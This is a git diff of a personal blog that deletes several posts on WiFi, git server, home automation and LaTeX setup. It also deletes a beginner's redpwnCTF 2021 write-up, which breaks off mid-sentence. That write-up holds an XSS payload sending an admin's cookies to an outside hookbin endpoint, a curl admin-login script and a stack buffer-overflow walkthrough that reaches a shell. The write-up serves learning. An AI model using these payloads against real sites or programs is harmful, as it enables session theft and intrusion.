diff options
Diffstat (limited to 'posts')
| -rw-r--r-- | posts/avanswifi.md | 26 | ||||
| -rw-r--r-- | posts/by-date.md | 12 | ||||
| -rw-r--r-- | posts/by-title.md | 12 | ||||
| -rw-r--r-- | posts/connect4.md | 17 | ||||
| -rw-r--r-- | posts/git.md | 161 | ||||
| -rw-r--r-- | posts/homeauto.md | 248 | ||||
| -rw-r--r-- | posts/index.md | 25 | ||||
| -rw-r--r-- | posts/latex.md | 120 | ||||
| -rw-r--r-- | posts/redpwn2021.md | 775 | ||||
| -rw-r--r-- | posts/scoop.md | 115 | ||||
| -rw-r--r-- | posts/software.md | 275 | ||||
| -rw-r--r-- | posts/style.scss | 19 |
12 files changed, 43 insertions, 1762 deletions
diff --git a/posts/avanswifi.md b/posts/avanswifi.md deleted file mode 100644 index 11191fd..0000000 --- a/posts/avanswifi.md +++ /dev/null @@ -1,26 +0,0 @@ -[meta]: <title> (Avans wifi setup) -[meta]: <subtitle> (How to use Avans eduroam with NetworkManager) -[meta]: <author> (Loek) -[meta]: <date> (September 9 2021) -[meta]: <tags> (software) -[meta]: <cover> (/img/avanswifi.png) - -I wasted 2 hours trying to set up my school's WiFi, so here's a quick reference -for other students who might've tried connecting but ended up giving up. - -``` -$ nmcli connection edit type wifi -nmcli> set 802-11-wireless.ssid eduroam -nmcli> set 802-1x.eap peap -nmcli> set 802-1x.phase2-auth mschapv2 -nmcli> set 802-1x.identity <avans username> -nmcli> set 802-1x.password <avans password> -nmcli> set wifi-sec.key-mgmt wpa-eap -nmcli> save -nmcli> activate -``` - -Keep in mind that your username isn't your student e-mail, but the first letter -of your first name, and 7 characters from your last name, e.g. `Loek Le -Blansch -> lblansch`. - diff --git a/posts/by-date.md b/posts/by-date.md new file mode 100644 index 0000000..2c47d18 --- /dev/null +++ b/posts/by-date.md @@ -0,0 +1,12 @@ +--- +title: post listing +layout: default +id: posts +toc: false +post: false +--- + +{% include posts.html + sort="date" +%} + diff --git a/posts/by-title.md b/posts/by-title.md new file mode 100644 index 0000000..db49dcd --- /dev/null +++ b/posts/by-title.md @@ -0,0 +1,12 @@ +--- +title: post listing +layout: default +id: posts +toc: false +post: false +--- + +{% include posts.html + sort="title" +%} + diff --git a/posts/connect4.md b/posts/connect4.md deleted file mode 100644 index 89f8db2..0000000 --- a/posts/connect4.md +++ /dev/null @@ -1,17 +0,0 @@ -[meta]: <title> (Connect 4 beta live!) -[meta]: <subtitle> (Announcement post) -[meta]: <author> (Loek) -[meta]: <date> (April 24 2021) -[meta]: <tags> (connect 4, beta) -[meta]: <cover> (/img/connectfourbeta.png) - -My connect four website is currently online as a public beta. You can visit the -website at <https://connect4.pipeframe.xyz>. A list of known bugs is on the -homepage, and all other issues should be submitted to -[GitHub](https://github.com/lonkaars/connect-4/issues). - -If I encounter some very interesing bug that I think deserves it's own blog -post I'll write one about it of course. I have one more week from now to worry -about the connect four website, but after that I'm going to start preparing for -my school exams. - diff --git a/posts/git.md b/posts/git.md deleted file mode 100644 index 7d3ddbe..0000000 --- a/posts/git.md +++ /dev/null @@ -1,161 +0,0 @@ -[meta]: <title> (My git setup) -[meta]: <subtitle> (How I use git on my server) -[meta]: <author> (Loek) -[meta]: <date> (April 28 2021) -[meta]: <tags> (git, server, software) -[meta]: <cover> (/img/git.png) - -## Overview - -I have two mechanisms set up for accessing my git server. I use gitolite for -ssh access and permission management. I also have cgit set up which generates -html pages for viewing your repositories and also hosts your repositories over -http, or https if you have it set up. - -## SSH Access with gitolite - -Gitolite was a pain in the ass to set up because I didn't understand umasks -before I started trying to set it up. A *umask* is like the opposite of what -you'd enter when running `chmod`. For example: if I run `touch test`, I will -now have a file with the same permissions as `chmod 644`. That looks something -like this: - -```sh -$ touch test -$ ls -l -total bla bla --rw-r--r-- 1 loek users 0 Apr 28 12:28 test -$ chmod 644 test -$ ls -l -total bla bla --rw-r--r-- 1 loek users 0 Apr 28 12:28 test -$ # notice the same permissions on the 'test' file -``` - -If I want gitolite to create repositories with default permissions so other -users can read the repositories, I have to set my umask to the opposite of 644. -Here's a quick explanation of `ls -l`'s output: - -```sh --rw-r--r-- * user group size date time filename -|└┬┘└┬┘└┬┘ -| | | └all users -| | └owner group -| └owner user -└type -``` - -Each digit in a `chmod` command sets the permission for the file owner, file -group, then everyone. That looks something like this: - -```sh -$ chmod 644 test - -decimal: 6 4 4 -binary: 110 100 100 -ls -l: - rw- r-- r-- -``` - -Then we take the opposite of this to get the umask: - -```sh -$ chmod 755 directory -R - -ls -l: d rwx r-x r-x -binary: 000 010 010 -decimal: 0 2 2 -``` - -And now my `.gitolite.rc`: - -```perl -%RC = ( - UMASK => 0022, - ROLES => { - READERS => 1, - WRITERS => 1, - }, - - ENABLE => [ - 'ssh-authkeys', - 'git-config', - 'daemon', - 'gitweb', - ], -); - -1; -``` - -## HTTP(S) Access with cgit - -Cgit is probably the easiest thing to set up. It has great built-in -documentation (`man 5 cgitrc`). Pretty much all configuration is in -`/etc/cgitrc` (css/syntax highlighting isn't in there). The only reason I'm -posting my config here is because for some reason, the order of the options in -cgit's config matters: - -```rc -# -# cgit config -# see cgitrc(5) for details - -cache-size=0 -enable-commit-graph=1 - -css=/cgit.css -logo=/cgit.png - -virtual-root=/ -remove-suffix=1 - -root-title=git :tada: - -## -## List of common mimetypes -## -mimetype.gif=image/gif -mimetype.html=text/html -mimetype.jpg=image/jpeg -mimetype.jpeg=image/jpeg -mimetype.pdf=application/pdf -mimetype.png=image/png -mimetype.svg=image/svg+xml - -# Highlight source code with python pygments-based highlighter -source-filter=/usr/lib/cgit/filters/syntax-highlighting.py - -# Format markdown, restructuredtext, manpages, text files, and html files -# through the right converters -about-filter=/usr/lib/cgit/filters/about-formatting.sh - -## -## Search for these files in the root of the default branch of repositories -## for coming up with the about page: -## -readme=:README.md -readme=:readme.md -readme=:README.rst -readme=:readme.rst -readme=:README.txt -readme=:readme.txt -readme=:README -readme=:readme -readme=:INSTALL.md -readme=:install.md -readme=:INSTALL.mkd -readme=:install.mkd -readme=:INSTALL.rst -readme=:install.rst -readme=:INSTALL.html -readme=:install.html -readme=:INSTALL.htm -readme=:install.htm -readme=:INSTALL.txt -readme=:install.txt -readme=:INSTALL -readme=:install - -scan-path=/mnt/scf/git/repositories -``` - diff --git a/posts/homeauto.md b/posts/homeauto.md deleted file mode 100644 index 35d8d12..0000000 --- a/posts/homeauto.md +++ /dev/null @@ -1,248 +0,0 @@ -[meta]: <title> (My home automation adventure) -[meta]: <subtitle> (How to make your house a shitty utopia) -[meta]: <author> (Loek) -[meta]: <date> (August 17 2021) -[meta]: <tags> (home automation, raspberry pi, esp8266, cc2500, microcontrollers, software, hardware, hacking) -[meta]: <cover> (/img/homeauto.png) - -Home automation is cool, but it can also be scary. I want to try to convert my -existing bedroom lights into 'smart' lights that I can control using a home -automation system. - -I've tried two home automation systems so far: homebridge and home assistant. -Homebridge isn't really an automation system. It's meant to add unsupported -devices to *homekit*, but doesn't work with anything other than apple devices. -I've also tried (and am currently using) home assistant. It's a complete -replacement for the homekit ecosystem, and it can do basically anything, as -long as you're patient enough... - -The devices I'm going to try to automate are: - -- A random bluetooth RGB/white lamp I bought a couple years back -- An RGB strip under my bed my mom got me for christmas -- A gen 1 Philips LivingColors lamp from 2008 -- My Toshiba RAS-M10GKV-E2 air conditioning unit - -## Bluetooth RGB lamp - -This lamp is apparently another Chinese product that gets rebranded and sold -under different names. I bought mine as the "[Shada led's -light](http://leds-lightpro.com/node/4368)" (no the apostrophe isn't a typo). - -When scanning for bluetooth devices using `bluetoothctl` on Linux, it shows up -as an LE device called "Beken LED". - -I don't remember what search term I used when searching for it's bluetooth -protocol, but I landed on [this page](https://wiki.fhem.de/wiki/BEKEN_iLedBlub) -from a german website about home automation, where it's called the "BEKEN -iLedBulb". It documents which Bluetooth LE characteristics you need to write to -for the lamp to change color. - -The lamp has both [iOS](https://apps.apple.com/us/app/leds-light/id1058642950) -and -[android](https://play.google.com/store/apps/details?id=com.shada.ledslight&hl=en_US&gl=US) -apps available, though only the iOS app seemed to work. - -### Writing a homebridge plugin - -When I started out with this home automation business, I used homebridge -because I didn't know about home assistant yet. Developing plugins for -homebridge is actually pretty easy (after figuring out [how to get the plugin -to load](https://github.com/homebridge/homebridge/issues/2958)). The -documentation is pretty good, and it has typescript integration for maximum -/comfy/-ness. - -Because HomeKit doesn't support RGBW or RGBWW lights (lights that have both rgb -and dedicated white diodes), I chose to display them as seperate rgb and white -lamps inside the home app. - -[The plugin](https://www.npmjs.com/package/homebridge-beken) is pretty janky, -and requires some manual setup, but it worked very consistently for the single -week I used it for. - -### Converting the homebridge plugin to home assistant - -Now that I could control a single bulb using the home app and siri, I needed -more. The homebridge website allows for turning devices on/off, but doesn't -allow color changes. I also liked the idea of controlling the lights using my -phone, which runs android. - -Home assistant was the solution, so I went ahead and installed [home assistant -core](https://www.home-assistant.io/installation/linux#install-home-assistant-core) -on the Raspberry Pi 3B+ I'm using as a dedicated home automation hub. - -Upon opening it for the first time, I noticed it was much slower than -homebridge, but that's because it was installing a bunch of other stuff in the -background. After waiting for the background tasks to complete, I was greeted -with a very nice web interface. There were also already devices that I could -integrate immediately, like the downstairs chromecasts, and my Jellyfin server. - -Now I had to figure out how to write a plugin for home assistant. There's some -concepts in the home assistant ecosystem that I didn't quite understand, which -made searching where to start harder. - -**Integrations** are like plugins, they allow you to *integrate* an unsupported -device into home assistant. Integrations create **devices** which create -**entities** (device properties). Certain entity types can only be read (like -`sensor`), and others can also be updated / written to (lights). - -The documentation for creating entity integrations is pretty poopy, and I -mostly used other plugins on GitHub as reference material. The home assistant -plugin code is available on -[GitHub](https://github.com/lonkaars/homeassistant-beken) and [my personal git -server](https://git.pipeframe.xyz/lonkaars/homeassistant-beken/about). - -## RGB gamer bed - -I was originally planning to control this strip using IR remote emulation, but -I remembered a friend of mine still had an esp8266 laying around. So I went the -extra mile and wanted to try to create a new driver board for the strip -instead. - -### Opening the original driver - - - - - - - - - -### Making a custom driver board - -**I AM NOT AN ELECTRICIAN**. I looked on the internet, and I think this is just -a simple board with some mosfets and flash memory for storing the 6 custom -colors. The mosfets are the 3 big squares labeled Q1, Q2 and Q3. The way the -strip works is it gets +12v though the black wire, and then lights up when you -ground any combination of the red, green, and blue wires. The strip dims using -pulse width modulation. The mosfets act like an electronic switch, and control -the grounding of the colored wires. - -I'm going to salvage the mosfets, and barrel plug from the original driver -board, and resolder them on a perfboard with the esp8266 so I can control them -over WiFi. The schematic I'm using comes from -[instructables](https://www.instructables.com/WiFi-Controlled-RGB-LED-Strip-With-ESP8266/). - - - -The whole solder job was a complete massacre, and I really don't want to show -it. It does work though, but I had to buy a new soldering station because my -old soldering iron wasn't really fit for soldering small electronics. - -### Beautiful dremel work - -I wanted to use the original enclosure instead of a tupperware container this -time, so I used my dad's dremel to create holes for the esp to fit. - - - - - -As you can see I did a great job :^) - -The esp is still at the bottom of the case, but getting everything to fit -inside was so hard that I completely forgot to take pictures. So here's a -picture of the finished controller mounted under my bed using two small nails: - - - -### ESP firmware - -The firmare I wrote for the esp is available on -[GitHub](https://github.com/lonkaars/esp8266-rgbstrip) and [my git -server](https://git.pipeframe.xyz/lonkaars/esp8266-rgbstrip/about), along with -the home assistant plugin -([GitHub](https://github.com/lonkaars/hass-esp8266-rgbstrip), -[cgit](https://git.pipeframe.xyz/lonkaars/hass-esp8266-rgbstrip/about)). I used -the [espressif ESP8266_RTOS_SDK](https://github.com/espressif/ESP8266_RTOS_SDK) -toolchain with gnu make as my build system. - -It just connects to your specified wifi network under your specified hostname, -and listens on port 80 for regular http requests. Here's how to use it without -the home assistant plugin: - -```bash -# get color -curl http://hostname/ - -# set color rrggbb color (hex) -curl -X POST -d "0000ff" http://hostname/ -``` - -Some cool features this firmare has are: - -- Linearly interpolated color transitions with customizable transition and step - duration -- Brightness curve correction (makes difference in brightness more pronounced - at higher brightness levels by using a parabolic curve) - -I'm not sure if the more popular [ESPHome](https://esphome.io/) firmare has -these features, but I wanted to have a go at writing my own firmare anyways. - -### Safety - -Because the esp8266 is a pretty basic microcontroller, it doesn't use https or -ssl for encryption. To protect from people in my house wanting to control my -lights, I used the raspberry pi's onboard wifi module to create a hidden -private isolated wifi network for this, and all future IoT devices in my -bedroom. I'm using `hostapd` to create the wifi network, and `dnsmasq` for -assigning ip addresses and hostname resolution. Here's the config file for -`dnsmasq`: - -``` -no-resolv -interface=wlan0 -dhcp-range=10.0.0.1,10.0.0.16,24h -server=8.8.8.8 -``` - -And here's `hostapd`'s config file: - -```bash -# common settings -interface=wlan0 -driver=nl80211 -ssid=network_name_here -hw_mode=g -channel=1 -macaddr_acl=0 -auth_algs=1 -ignore_broadcast_ssid=1 -wpa=2 -wpa_passphrase=network_password_here -wpa_key_mgmt=WPA-PSK -rsn_pairwise=CCMP - -# raspberry pi 3b+ specific settings -ieee80211n=1 # 802.11n support -wmm_enabled=1 # QoS support -ht_capab=[HT40+][SHORT-GI-20][DSSS_CCK-40] -``` - -Very complicated stuff... - -## Philips LivingColors lamp - -[This](http://www.knutsel.org/2009/01/01/livingcolors-1st-generation/) article -describes all the research that went into reverse-engineering the lamp. - -I ordered a cc2500 wireless transmitter and receiver, but the seller cancelled -the order, and now I have to wait a while longer to get one. I'll update this -article once I've set it up though. - -## Toshiba air conditioning unit - -I created a small daughter board to connect to the raspberry pi's gpio pins, -that has an IR phototransistor and IR blaster. This is so I could record and -replay the IR messages from the remote more easily. - -I've spent a solid two days now trying to use my raspberry pi or arduino uno as -a janky logic analyzer, to capture the IR messages and get the message contents -manually, but I still haven't succeeded. I have however succeeded in frying the -IR LED by giving it +5v backwards without any protection, so that's something I -guess. I'll update this section of the article together with the Philips lamp. - - -To be continued... - diff --git a/posts/index.md b/posts/index.md deleted file mode 100644 index 50894f5..0000000 --- a/posts/index.md +++ /dev/null @@ -1,25 +0,0 @@ -[meta]: <title> (Loek's excruciatingly interesting blog) -[meta]: <subtitle> (This is the article that's displayed on the home page) -[meta]: <author> (Loek) -[meta]: <date> (April 12 2021) -[meta]: <tags> (home) -[meta]: <cover> (/img/helloworld.png) - -Welcome to my blog page! This is where I post updates on things that I do such -as: - -- Cool open source software that I think you should use -- How to set up self-hosted applications -- Rants about Microsoft Windows -- Maybe some recipes I dunno - -The page you're looking at right now is also open-source! The code for this -page can be found on [GitHub](https://github.com/lonkaars/blog), and should -also be available on [my private git server](https://git.pipeframe.xyz). - -An rss/atom feed of this blog is also available: - -``` -https://blog.pipeframe.xyz/atom.xml -``` - diff --git a/posts/latex.md b/posts/latex.md deleted file mode 100644 index 4234c84..0000000 --- a/posts/latex.md +++ /dev/null @@ -1,120 +0,0 @@ -[meta]: <title> (My LaTeX setup) -[meta]: <subtitle> (How to set up a simple LaTeX environment with XeTeX and latexmk) -[meta]: <author> (Loek) -[meta]: <date> (January 24 2022) -[meta]: <tags> (software, latex, git) -[meta]: <cover> (/img/latex.png) - -I started using LaTeX instead of MS Word about two years ago, and I've never -regretted the decision. I switched out of frustration because Word makes it -really easy to mess up your document structure without you noticing. - -## Cool features LaTeX gets you - -- Automatically numbered figures with references that automatically update -- Really simple bibliography management with `biblatex` -- Packages that help you typeset scientific things like chemistry or physics -- Professional looking output documents with very little effort -- Automation of repetitive things with macros -- It's a plain text format, so it works well with `git` or other version - control software -- Probably more - -## Installation - -This guide is for Arch Linux and it's derivatives, but you can use -[pkgs.org](https://pkgs.org) to find the mentioned packages if they're under a -different name in your distro's package manager. - -### Required packages - -- `biber` -- `texlive-most`, containing: - - `texlive-bibtexextra` - - `texlive-core ` - - `texlive-fontsextra ` - - `texlive-formatsextra` - - `texlive-games` - - `texlive-humanities` - - `texlive-latexextra` - - `texlive-music` - - `texlive-pictures` - - `texlive-pstricks` - - `texlive-publishers` - - `texlive-science` -- `latex-mk` - -tl;dr - -``` -# pacman -S texlive-most biber latex-mk -``` - -### Force XeTeX compiler with latexmk - -To force latexmk to use the `xelatex` compiler instead of `pdflatex` you can -create `~/.config/latexmk/latexmkrc` with the following content: - -``` -$pdflatex = "xelatex %O %S"; -$pdf_mode = 1; -$dvi_mode = 0; -$postscript_mode = 0; -``` - - -## Hello world - -LaTeX uses a lot of auxiliary files for compilation, so it's a good idea to -create a new directory for every document. After creating a new directory, -create a .tex file and open it with a text editor. - -```tex -\documentclass[12pt, a4paper, dutch]{article} -\usepackage[margin=1in]{geometry} -\usepackage{babel} - -\bigskipamount=7mm -\medskipamount=4mm -\parindent=0mm - -\begin{document} -Hello world! -\end{document} -``` - -This is the starting point I generally use for all my documents. It uses a4 -paper and 2.54cm margins, which is the default in Word (in Europe). Because -most of my documents are in Dutch, I add the `dutch` option to my document -class, and import the babel package for correct word breaking and built-in -latex heading translations. I also disable paragraph indenting, and modify the -`\bigskip` and `\medskip` distances. - -After creating the .tex file, you can run `latexmk <your .tex file>` to compile -the document. When it's done, you should have a new .pdf file in your directory -with the same name as the .tex file. - -Keep in mind that you can probably install an extension for your text editor to -have it automatically compile and refresh your document for you. If you're -using Visual Studio Code, you can use the [LaTeX -Workshop](https://marketplace.visualstudio.com/items?itemName=James-Yu.latex-workshop) -extension, and for vim I use [vimtex](https://github.com/lervag/vimtex) with -[coc-vimtex](https://github.com/neoclide/coc-vimtex) for -[coc](https://github.com/neoclide/coc.nvim). - -## Notes - -### LaTeX and git - -Because LaTeX creates a lot of temporary files, you should add the following to -your repository's `.gitignore`: - -```gitignore -**/*.aux -**/*.fdb_latexmk -**/*.fls -**/*.log -**/*.out -**/*.synctex.gz -``` - diff --git a/posts/redpwn2021.md b/posts/redpwn2021.md deleted file mode 100644 index 97ee0a9..0000000 --- a/posts/redpwn2021.md +++ /dev/null @@ -1,775 +0,0 @@ -[meta]: <title> (redpwnCTF 2021) -[meta]: <subtitle> (A noob's perspective) -[meta]: <author> (Loek, Willem) -[meta]: <date> (July 13 2021) -[meta]: <tags> (hacking, CTF, writeup) -[meta]: <cover> (/img/redpwn2021.png) - -This is the first 'real' CTF I've participated in. About two weeks ago, a -friend of mine was stuck on some challenges from the Radboud CTF. This was a -closed CTF more geared towards beginners (high school students), and only had a -few challenges which required deeper technical knowledge of web servers and -programming. Willem solved most of the challenges, and I helped solve 3 more. - -Apart from those challenges, basically all my hacking knowledge comes from -computerphile videos, liveoverflow videos and making applications myself. - -> epic announcement!!! -> -> Willem has added explanations of the challenges he solved, so go read them! - -## Challenges - -### web/pastebin-1 - -This challenge is a simple XSS exploit. The website that's vulnerable is -supposed to be a clone of pastebin. I can enter any text into the paste area, -and it will get inserted as HTML code into the website when someone visits the -generated link. - -The challenge has two sites: one with the pastebin clone, and one that visits -any pastebin url as the website administrator. The goal of this challenge is -given by it's description: - -> Ah, the classic pastebin. Can you get the admin's cookies? - -In JS, you can read all cookies without the `HttpOnly` attribute by reading -`document.cookie`. This allows us to read the cookies from the admin's browser, -but now we have to figure out a way to get them sent back to us. - -Luckily, there's a free service called [hookbin](https://hookbin.com/) that -gives you an http endpoint to send anything to, and look at the request -details. - -Combining these two a simple paste can be created: - -```html -<script> - var post = new XMLHttpRequest(); - post.open("post", "https://hookb.in/<endpoint url>"); - post.send(document.cookie); -</script> -``` - -### crypto/scissor - -I wasn't planning on including this one, but it makes use of the excellent -[CyberChef](https://gchq.github.io/CyberChef/) tool. The flag is given in the -challenge description, and is encrypted using a ceasar/rot13 cipher. A simple -python implementation of this cipher is included with the challenge, but I just -put it into CyberChef and started trying different offsets. - -### rev/wstrings - -> Some strings are wider than normal... - -This challenge has a binary that uses a simple `strcmp` to check the flag. When -running the program, the following output is visible: - -```sh -# ./wstrings -Welcome to flag checker 1.0. -Give me a flag> -``` - -My first stategy was running the `strings` utility on the `wstrings` binary, -but I didn't find the flag. What was interesting to me though was that I also -couldn't find the prompt text... This immediately made me check for other -string encodings. - -Running the `strings` utility with the `-eL` flag tells `strings` to look for -32-bit little-endian encoded strings, and lo and behold the flag shows up! - -This is because ascii strings are less 'wide' than 32-bit strings: - -``` - --- ascii --- - -hex -> 0x68 0x65 0x6c 0x6c 0x6f -str -> h e l l o -``` - -Notice how each character is represented by a single byte each (8 bits) in -ascii, as opposed to 32-bit characters in 32-bit land. - -``` - --- 32-bit land --- - -hex -> 0x00000068 0x00000065 0x0000006c 0x0000006c 0x0000006f -str -> h e l l o -``` - -I think 32-bit strings also have practical use for things like non-English -texts such as Hebrew, Chinese or Japanese. Those characters take up more space -anyways, and you would waste less space by not using unicode escape characters. - -### web/secure - -> Just learned about encryption—now, my website is unhackable! - -This challenge is pretty simple if you know some of JS's quirks. Right at the -top of the file is an sqlite3 expression in JS: - -```js -//////// -db.exec(`INSERT INTO users (username, password) VALUES ( - '${btoa('admin')}', - '${btoa(crypto.randomUUID)}' -)`); -``` - -This section of code immediately jumped out to me because I noticed that -`crypto.randomUUID` wasn't actually being called. - -Because the 'random uuid' is being fed into `btoa()` it becomes a base64 -encoded string. However, `btoa()` also expects a string as input. Because every -object in JS has a `.toString()` method, when you pass it into a function -expecting another type, JS will happily convert it for you without warning. - -This means that the admin's password will always be a base64-encoded version of -`crypto.randomUUID`'s source code. We can get that base64-encoded source code -by running the following in a NodeJS REPL: - -```js -// import file system and crypto modules -var writeFileSync = require('fs').writeFileSync; -var crypto = require('crypto'); - -// write source to file -writeFileSync('./randomUUID.js', btoa(crypto.randomUUID.toString()), 'utf-8'); -``` - -I made a simple shell script that calls cURL with the base64-encoded -parameters, and decodes the url-encoded flag afterwards: - -```sh -#!/bin/sh - -# https://stackoverflow.com/questions/6250698/how-to-decode-url-encoded-string-in-shell -function urldecode() { : "${*//+/ }"; echo -e "${_//%/\\x}"; } - -urldecode $(curl -sX POST \ - -d "username=$(printf 'admin' | base64)" \ - -d "password=$(cat ./randomUUID.js)" \ - https://secure.mc.ax/login) -``` - -### crypto/baby - -> I want to do an RSA! - -This challenge is breaking RSA. It only works because the `n` parameter is -really small. - -Googling for 'rsa decrypt n e c' yields -[this](https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c) -stackoverflow result, which links to -[dcode.fr](https://www.dcode.fr/rsa-cipher). The only thing left to do is -calculate `p` and `q`, which can be done using [wolfram -alpha](https://wolframalpha.com/). - -### pwn/beginner-generic-pwn-number-0 - -> rob keeps making me write beginner pwn! i'll show him... -> -> `nc mc.ax 31199` - -This was my first interaction with `gdb`. It was.. painful. After begging for -help in the redpwnCTF discord server about another waaaay harder challenge, an -organizer named asphyxia pointed me towards [gef](https://github.com/hugsy/gef) -which single-handedly saved my sanity during the binary exploitation -challenges. - -The first thing I did was use [iaito](https://github.com/radareorg/iaito) to -look at a disassembly graph of the binary. Iaito is a graphical front-end to -the radare2 reverse engineering framework, and I didn't feel like learning two -things at the same time, so that's why I used it. While it's very -user-friendly, I didn't look into reverse engineering tools very much, and -didn't realise that iaito is still in development. Let's just say I ran into -some issues with project saving so I took lots of unnecessary repeated steps. - -After trying to make sense of assembly code after just seeing it for the first -time, I instead decided looking at the source code would be a better idea since -I actually know c. - -```c -#include <stdio.h> -#include <string.h> -#include <stdlib.h> - -const char *inspirational_messages[] = { - "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"", - "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"", - "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"", -}; - -int main(void) -{ - srand(time(0)); - long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *)); - char heartfelt_message[32]; - - setbuf(stdout, NULL); - setbuf(stdin, NULL); - setbuf(stderr, NULL); - - puts(inspirational_messages[inspirational_message_index]); - puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!"); - puts("can you write me a heartfelt message to cheer me up? :("); - - gets(heartfelt_message); - - if(inspirational_message_index == -1) { - system("/bin/sh"); - } -} -``` - -After looking at this source things became a lot clearer, because the only -input you can actually control is received from `gets(...);` - -Now comes the hard part: doing it, but in assembly! - -Some resources you should consume before attempting binary exploitation would -be [computerphile's video on buffer -overflows](https://www.youtube.com/watch?v=1S0aBV-Waeo) and -[cheat.sh/gdb](https://cheat.sh/gdb) for some basic gdb commands. The rest of -this section assumes you know the basics of both buffer overflows and gdb. - -First, let's print a disassembly of the `int main()` function: - -``` -(gdb) disas main -Dump of assembler code for function main: - 0x000000000040127c <+134>: call 0x4010a0 <puts@plt> - 0x0000000000401281 <+139>: lea rdi,[rip+0xec8] # 0x402150 - 0x0000000000401288 <+146>: call 0x4010a0 <puts@plt> - 0x000000000040128d <+151>: lea rdi,[rip+0xf1c] # 0x4021b0 - 0x0000000000401294 <+158>: call 0x4010a0 <puts@plt> - 0x0000000000401299 <+163>: lea rax,[rbp-0x30] - 0x000000000040129d <+167>: mov rdi,rax - 0x00000000004012a0 <+170>: call 0x4010f0 <gets@plt> - 0x00000000004012a5 <+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff - 0x00000000004012aa <+180>: jne 0x4012b8 <main+194> - 0x00000000004012ac <+182>: lea rdi,[rip+0xf35] # 0x4021e8 - 0x00000000004012b3 <+189>: call 0x4010c0 <system@plt> - 0x00000000004012b8 <+194>: mov eax,0x0 - 0x00000000004012bd <+199>: leave - 0x00000000004012be <+200>: ret -End of assembler dump. -``` - -This isn't the full output from gdb, but only the last few lines. A few things -should immediately stand out: the 3 `<puts@plt>` calls, and right after the -call to `<gets@plt>`. These are the assembly equivalent of: - -```c -puts(inspirational_messages[inspirational_message_index]); -puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!"); -puts("can you write me a heartfelt message to cheer me up? :("); - -gets(heartfelt_message); -``` - -Since I didn't see any reference to a flag file being read, I assumed that the -`system("/bin/sh")` call is our main target, so let's see if we can find that -in our assembly code. There's a call to `<system@plt>` at `<main+189>`, and -there's other weird `cmp`, `jne` and `lea` instructions before. Let's figure -out what those do! - -After some stackoverflow soul searching, I found out that the `cmp` and `jne` -are assembly instructions for compare, and jump-if-not-equal. They work like -this: - -```asm6502 -; cmp compares what's in the $rbp register to 0xffffffffffffffff -; and turns on the ZERO flag if they're equal - 0x004012a5 <+0>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff - -; jne checks if the ZERO flag is on, -; and if it is it jumps (in this case) to 0x4012b8 -┌--0x004012aa <+1>: jne 0x4012b8 <main+194> -│; we can safely ignore the `lea` instruction as it doesn't impact our pwn -│ 0x004012ac <+2>: lea rdi,[rip+0xf35] # 0x4021e8 -│ -│; the almighty syscall -│ 0x004012b3 <+3>: call 0x4010c0 <system@plt> -│ -│; from here on the program exits without calling /bin/sh -└->0x004012b8 <+4>: mov eax,0x0 - 0x004012bd <+5>: leave - 0x004012be <+6>: ret -``` - -The program checks if there's `0xffffffffffffffff` in memory `0x8` bytes before -the `$rbp` register. The program allocates 32 bytes of memory for our heartfelt -message, but it continues reading even if our heartfelt message is longer than -32 bytes. Let's see if we can overwrite that register >:) - -Let's set a breakpoint after the `<gets@plt>` call in gdb, and run the program -with 40 bytes of `0x61` ('a') - -``` -(gdb) break *0x00000000004012a5 -Breakpoint 1 at 0x4012a5 - -(gdb) run < <(python3 -c "print('a' * 40)") -``` - -I'm using the `run` command with `<` and `<()` to pipe the output of python -into the program's `stdin`. It's unnecessary at this stage because there's an -'a' key on my keyboard, but if we were to send raw bytes, this would make it a -lot easier. - -I'm also using [gef](https://github.com/hugsy/gef) so I get access to a command -called `context` which prints all sorts of information about registers, the -stack and a small disassembly window. I won't show it's output here, but it -was an indispensable tool that you should install nonetheless. - -Let's print the memory at `[$rbp - 0x8]`: - -``` -(gdb) x/8gx $rbp - 0x8 -0x7fffffffd758: 0x0000000000000000 0x0000000000000000 -0x7fffffffd768: 0x00007ffff7de4b25 0x00007fffffffd858 -0x7fffffffd778: 0x0000000100000064 0x00000000004011f6 -0x7fffffffd788: 0x0000000000001000 0x00000000004012c0 -``` - -Hmmm, no overwriteage yet. Let's try 56 bytes instead: - -``` -(gdb) run < <(python3 -c "print('a' * 56)") -(gdb) x/8gx $rbp - 0x8 -0x7fffffffd758: 0x6161616161616161 0x6161616161616161 -0x7fffffffd768: 0x00007ffff7de4b00 0x00007fffffffd858 -0x7fffffffd778: 0x0000000100000064 0x00000000004011f6 -0x7fffffffd788: 0x0000000000001000 0x00000000004012c0 -(gdb) x/1gx $rbp - 0x8 -0x7fffffffd758: 0x6161616161616161 -``` - -Jackpot! We've overwritten 16 bytes of the address that the `cmp` instruction -reads. Let's try setting it to `0xff` instead, so we get a shell. Python 3 is -not that great for binary exploitation, so the code for this is a little bit -ugly, but if it works, it works! - -``` -(gdb) run < <(python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)") -(gdb) x/1gx $rbp - 0x8 -0x7fffffffd758: 0xffffffffffffffff -``` - -Now let's let execution continue as normal by using the `continue` command: - -``` -(gdb) continue -Continuing. -[Detaching after vfork from child process 22950] -[Inferior 1 (process 22947) exited normally] -``` - -This might seem underwhelming, but our explit works! A child process was -spawned, and as a bonus, we didn't get any segmentation faults! The reason we -don't get an interactive shell is because we used python to 